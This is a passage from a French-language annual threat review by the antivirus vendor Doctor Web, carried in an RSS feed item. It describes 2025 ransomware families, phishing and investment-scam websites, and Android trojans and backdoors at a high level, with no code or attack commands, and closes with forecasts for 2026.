    &lt;dd&gt;Un ransomware à chiffrement connu sous le nom de Macop (l'une des variantes de ce cheval de Troie est &lt;b&gt;Trojan.Encoder.30572&lt;/b&gt;). Il est de petite taille, environ 30-40 Ko. Cela est dû en partie au fait que le cheval de Troie ne comporte pas de bibliothèques cryptographiques tierces et n'utilise que des fonctions CryptoAPI pour le cryptage et la génération de clés. Il utilise l'algorithme AES-256 pour crypter les fichiers, et les clés elles-mêmes sont cryptées avec RSA-1024.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; &lt;span class="font-normal"&gt;(2,31% des demandes)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Logiciel de chiffrement, dont des artefacts indiquent l'implication du groupe de pirates informatiques C77L.v. dans sa création.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; &lt;span class="font-normal"&gt;(2,13% des demandes)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Cheval de Troie de type ransomware existant en plusieurs versions. Ses modifications actuelles chiffrent les fichiers à l'aide de l'algorithme AES-256+RSA.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Fraudes sur le Web&lt;/h3&gt;

&lt;p&gt;En 2025, les analystes de Doctor Web ont observé une augmentation du nombre de sites d'hameçonnage créés pour voler des comptes de messagerie Telegram. Les attaquants ont utilisé diverses techniques : fausses pages d’authentification et d’autorisation, faux messages du support Telegram signalant de prétendues violations dans l’utilisation du messenger et la nécessité de « vérifier » le compte, etc.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Voici un exemple de site d'hameçonnage vous informant que vous devez vérifier votre compte Telegram suite à une violation des conditions d'utilisation du service.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Des sites web similaires ont également été créés pour les utilisateurs d'autres services, tels que les plateformes de jeux, les boutiques en ligne, etc. Ces faux sites pouvaient ressembler à de véritables ressources en ligne et inciter les utilisateurs à se connecter à leurs comptes.&lt;/p&gt;

&lt;p&gt;Si les utilisateurs tombaient dans le piège, des informations confidentielles se retrouvaient entre les mains des attaquants.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un faux site web Steam affiche un formulaire d'hameçonnage demandant la saisie d'un identifiant et d'un mot de passe.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Les utilisateurs se sont de nouveau retrouvés confrontés à diverses ressources frauduleuses en ligne proposant toutes sortes de cadeaux et de bonus, ainsi que la participation à certaines « promotions lucratives ». Les faux sites web de places de marché russes se sont multipliés, proposant aux visiteurs de participer à des " tirages au sort ". Les « gains » sur ces faux sites ont été programmés, et pour les « recevoir », la victime devait effectuer un certain paiement, par exemple, soi-disant sous forme de taxe, puis pour la livraison des biens et leur assurance. Dans d'autres versions de l'escroquerie, le produit désiré était soi-disant indisponible, mais un équivalent en espèces a été proposé à sa place. Pour « recevoir » l'argent, l'utilisateur devait également effectuer un certain nombre de paiements : frais, assurance, etc. La victime n'a finalement rien reçu.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Voici un exemple de faux site de vente en ligne proposant un « tirage au sort ».&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Des variantes de ces stratagèmes incluaient de faux sites web d'entreprises de transport ciblant les résidents britanniques. Ils proposaient de participer à un tirage au sort pour des cartes de transport, censément organisé à l'occasion d'un certain événement et prétendument permettant l'utilisation gratuite des transports publics. Après avoir « gagné », les escrocs demandaient à leurs victimes de fournir des informations personnelles et de payer une petite « commission ».&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un site web frauduleux, prétendant appartenir à une entreprise de transport, propose de participer à un « tirage au sort de tickets ».&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Toutes sortes de sites web financiers frauduleux restent d'actualité. Les ressources proposant de gagner de l'argent en négociant sur le marché à l'aide de systèmes automatisés basés sur des soi-disant algorithmes uniques et des technologies d'intelligence artificielle ont de nouveau connu un grand succès auprès des pirates informatiques. Ces sites web sont créés en visant les résidents de nombreux pays. Le plus souvent, ils demandent des informations personnelles pour enregistrer une « demande » ou un « compte », puis ces informations tombent entre les mains de criminels qui les utilisent à leur guise. Ils peuvent ensuite revendre les données ou continuer à attirer des victimes potentielles vers un faux service d'investissement, en exigeant qu'elles déposent de l'argent sur un compte de « trading ».&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;L'un des sites web frauduleux proposant l'accès à une « plateforme d'investissement » basée sur des technologies d'intelligence artificielle a été prétendument lié à Apple. &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Bon nombre de ces sites sont construits à partir de modèles similaires, comme une fausse conversation avec un « assistant virtuel » ou un « employé » d'une entreprise particulière, censément au nom duquel les escrocs contactent la victime potentielle. L'utilisateur est invité à répondre à une série de questions, puis à fournir des informations personnelles.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sur l'un de ces sites web, les escrocs proposaient aux utilisateurs français l'accès à un logiciel de trading automatisé inexistant appelé TraderAI, qui leur permettrait de gagner 3 500 € minimum.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Une ressource faisait la promotion d'un service d'investissement prétendument intégré directement à la messagerie Telegram. Le site promettait un revenu de 10 000 € par mois grâce au trading automatisé d’actions de sociétés internationales « directement dans le navigateur de votre téléphone ».&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un site web frauduleux invite à rejoindre une « plateforme Telegram » qui prétend négocier des actions de manière indépendante.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Les escrocs proposaient également à leurs victimes potentielles de gagner de l'argent grâce à des « robots de trading » prétendument créés avec la participation de grandes entreprises et de services tels que Telegram, WhatsApp, TikTok et autres.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Voici un exemple de site web qui invitait les utilisateurs à utiliser un robot de trading inexistant, soi-disant lié à la messagerie WhatsApp.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Tout au long de l'année 2025, nos analystes internet ont identifié de nouveaux sites web frauduleux proposant des investissements dans le secteur pétrolier et gazier à des utilisateurs de nombreux pays, dont la Russie, la CEI et l'Europe. Sur ces sites web, les victimes potentielles sont souvent invitées à fournir des informations personnelles : prénom, nom, numéro de téléphone portable, adresse électronique, etc.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un site web frauduleux ciblant les citoyens kirghizes leur offre la possibilité de « gagner de l'argent grâce au pétrole et au gaz », promettant des profits importants.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Des sites web frauduleux proposant de recevoir une « aide gouvernementale » sous forme de paiements ou d'indemnisation, ont refait surface. Par exemple, des ressources frauduleuses prétendument liées au portail Gosuslugi ont été diffusées sur la partie russe d'Internet.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Voici un exemple de site web frauduleux se prétendant lié au service « Gosuslugi » et promettant aux utilisateurs russes des paiements stables de la part du gouvernement et d'une grande compagnie pétrolière et gazière. Pour « participer » au programme de paiement, la victime devait fournir des informations personnelles&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Nos experts ont également constaté l'apparition de nouveaux sites web frauduleux se présentant comme des projets éducatifs.&lt;br /&gt;Ils proposaient aux utilisateurs diverses formations pour améliorer leurs connaissances financières, apprendre un métier, etc. Pour « accéder » à la formation, les victimes potentielles,  devaient fournir des informations personnelles, comme dans de nombreuses autres arnaques similaires. &lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;L'un des sites web frauduleux proposait des cours d'anglais.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Les analystes internet de Doctor Web ont identifié de nouveaux sites web frauduleux vendant des billets de théâtre. Sur ces sites, les escrocs proposent aux victimes potentielles des billets à des prix avantageux. Mais en réalité, après le « paiement », les utilisateurs ne reçoivent rien.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Exemple de site web frauduleux vendant des billets de théâtre inexistants&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Par ailleurs, de nouveaux sites web frauduleux se faisant passer pour des cinémas privés se sont également multipliés. Comme pour les billets de théâtre, les escrocs proposent à leurs victimes potentielles des billets de cinéma, mais ces dernières finissent par leur remettre leur argent.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un faux site web d'un cinéma privé&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Сiblant les appareils mobiles&lt;/h3&gt;

&lt;p&gt;Selon les statistiques de détection de Dr.Web Security Space pour les appareils mobiles, en 2025, les utilisateurs Android ont le plus souvent rencontré les chevaux de Troie publicitaires &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, ainsi que les faux programmes &lt;a href="https://vms.drweb.fr/search/?q=Android.FakeApp&amp;lng=fr"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, qui, au lieu d'exécuter leurs fonctionnalités annoncées, peuvent charger divers sites Web, y compris des sites frauduleux et malveillants. Une augmentation de l'activité des applications du cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Triada&amp;lng=fr"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; a également été constatée. Ces Trojans sont des menaces multifonctionnelles que les attaquants intègrent dans le micrologiciel des appareils Android. De plus, on a constaté une augmentation du nombre d'attaques menées par le cheval de Troie bancaire &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Dans le même temps, l'activité des Trojans bancaires &lt;b&gt;Android.SpyMax&lt;/b&gt; a diminué.&lt;/p&gt;

&lt;p&gt;L'année dernière, les auteurs de virus ont continué à utiliser diverses techniques pour protéger des logiciels malveillants contre le système d'exploitation Android. L'une d'elles était une méthode de conversion du code DEX en code C (connue sous le nom de DCC ou DEX to C).&lt;/p&gt;

&lt;p&gt;Les applications indésirables les plus courantes étaient &lt;a href="https://vms.drweb.fr/search/?q=Program.FakeMoney&amp;lng=fr"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;. Ils offrent aux utilisateurs une possibilité d'accomplir diverses tâches en échange de récompenses virtuelles et promettent de convertir ces récompenses en argent réel. Mais en réalité, ils n'ont pas cette possibilité. De plus, les applications &lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Program.CloudInject&amp;lng=fr"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; ont été fréquemment détectées sur des appareils protégés. Les premiers imitent le fonctionnement des programmes antivirus et détectent des menaces inexistantes, proposant de « guérir » l'infection en achetant la version complète du logiciel. Les secondes sont des applications qui ont été modifiées via un service cloud populaire. Lorsqu'elles sont modifiées, elles sont complétées par des permissions système dangereuses et par un code obscurci dont la finalité est incontrôlable.&lt;/p&gt;

&lt;p&gt;Les programmes modifiés à l'aide de l'utilitaire NP Manager (détectés sous le nom &lt;b&gt;Tool.NPMod&lt;/b&gt;), sont devenus les logiciels potentiellement dangereux les plus répandus. Cet utilitaire masque le code des applications modifiées et leur permet de contourner la vérification de signature numérique. Les programmes publicitaires les plus actifs en 2025 étaient des modifications tierces de WhatsApp (&lt;a href="https://vms.drweb.fr/search/?q=Adware.ModAd&amp;lng=fr"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;), qui ouvraient automatiquement des liens publicitaires lors de l'utilisation du messenger.&lt;/p&gt;

&lt;p&gt;En 2025, de nouveaux cas d'infection du micrologiciel d'appareils Android ont été identifiés. Notre société a informé de l'un d'eux en avril. Des pirates ont préinstallé l'application malveillante &lt;a href="https://vms.drweb.fr/search/?q=Android.Clipper.31&amp;lng=fr"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; dans la zone système de plusieurs modèles de smartphones d'entrée de gamme et l'ont utilisée pour voler les cryptomonnaies des utilisateurs. D'autres attaquants ont réussi à injecter des chevaux de Troie dangereux &lt;a href="https://vms.drweb.fr/search/?q=Android.Triada&amp;lng=fr"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; dans le firmware d'autres modèles de smartphones Android. De plus, il y a eu d'autres cas d'infection du micrologiciel des décodeurs Android TV par de nouvelles versions du cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Vo1d&amp;lng=fr"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, que notre société &lt;a href="https://news.drweb.fr/show/?i=14900&amp;lng=fr" target="_blank"&gt;a détecté&lt;/a&gt; en 2024.&lt;/p&gt;

&lt;p&gt;Au cours de l'année écoulée, le laboratoire antivirus Doctor Web a identifié un certain nombre d'applications malveillantes dangereuses. En avril, nous avons signalé le cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Spy.1292.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, qui se cachait dans le programme de cartographie Alpine Quest modifié par des auteurs de virus et qui attaquait le personnel militaire russe. &lt;a href="https://vms.drweb.fr/search/?q=Android.Spy.1292.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; transmettait aux attaquants des données concernant le numéro de téléphone portable et les comptes, collectait les contacts du répertoire téléphonique, la géolocalisation de l'appareil infecté et des informations sur les fichiers stockés sur celui-ci. Il pouvait voler des fichiers spécifiques sur commande des attaquants. En particulier, les pirates s'intéressaient aux documents confidentiels transmis par des messagers populaires, ainsi qu'au fichier journal de géolocalisation du programme Alpine Quest.&lt;/p&gt;

&lt;p&gt;En août, nos spécialistes ont mis en garde contre la porte dérobée &lt;a href="https://vms.drweb.fr/search/?q=Android.Backdoor.916.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, que les attaquants dissimulaient sous l'apparence d'un programme antivirus et distribuaient par le biais de messages privés sur des applications de messagerie instantanée. &lt;a href="https://vms.drweb.fr/search/?q=Android.Backdoor.916.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; vole des informations confidentielles et permet la surveillance des utilisateurs. Cette porte dérobée visait principalement les employés d'entreprises russes.&lt;/p&gt;

&lt;p&gt;En octobre, nous avons signalé la présence de la porte dérobée multifonctionnelle &lt;a href="https://vms.drweb.fr/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, découverte par nos analystes dans des versions modifiées de l'application Telegram X. Ce logiciel malveillant est également utilisé pour dérober des données confidentielles, notamment les identifiants et mots de passe Telegram, les SMS entrants, les conversations et les données du presse-papiers. Cette porte dérobée permet aux attaquants de contrôler entièrement la messagerie et de surveiller le compte Telegram piraté de la victime. Pour contrôler la porte dérobée, les cybercriminels ont utilisé à la fois un serveur C2 et une base de données Redis, ce qui n’avait jamais été observé auparavant dans les menaces Android. &lt;a href="https://vms.drweb.fr/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; ciblait principalement les résidents d'Indonésie et du Brésil.&lt;/p&gt;

&lt;p&gt;Pour en savoir plus sur la situation virale et les menaces ciblant les appareils mobiles en 2025, consultez notre &lt;a href="https://news.drweb.fr/show/?i=15104" target="_blank"&gt;rapport&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;Perspectives et tendances probables&lt;/h3&gt;

&lt;p&gt;En 2026, l'une des menaces les plus courantes pour les utilisateurs restera probablement les chevaux de Troie publicitaires, que les cybercriminels utilisent pour générer des revenus illégaux. On peut s'attendre à ce que les cybercriminels utilisent de plus en plus les chevaux de Troie bancaires, qui leur permettent également de s'enrichir.&lt;/p&gt;

&lt;p&gt;La popularité de divers outils et techniques permettant de dissimuler des activités malveillantes pourrait encore augmenter. Ces techniques incluent l'utilisation de packers et d'obfuscateurs, l'utilisation de droppers de logiciels malveillants et de chargeurs multi-étapes, ainsi que l'utilisation de la stéganographie pour dissimuler la charge utile. De plus, lors de la création de logiciels malveillants, les cybercriminels, y compris ceux ayant peu d'expérience en programmation, auront de plus en plus recours à l'aide d'assistants IA. Par conséquent, de nouvelles familles de logiciels malveillants apparaîtront et le nombre de menaces augmentera.&lt;/p&gt;

&lt;p&gt;Les structures gouvernementales et corporatives seront à nouveau visées, ce qui entraînera de nouvelles attaques ciblées. De nouveaux cas d'infection du micrologiciel des smartphones Android, des décodeurs TV et d'autres types d'appareils mobiles sont également probables, notamment dans le segment d'entrée de gamme. Les fraudeurs sur Internet resteront actifs.&lt;/p&gt;</description></item></channel></rss>
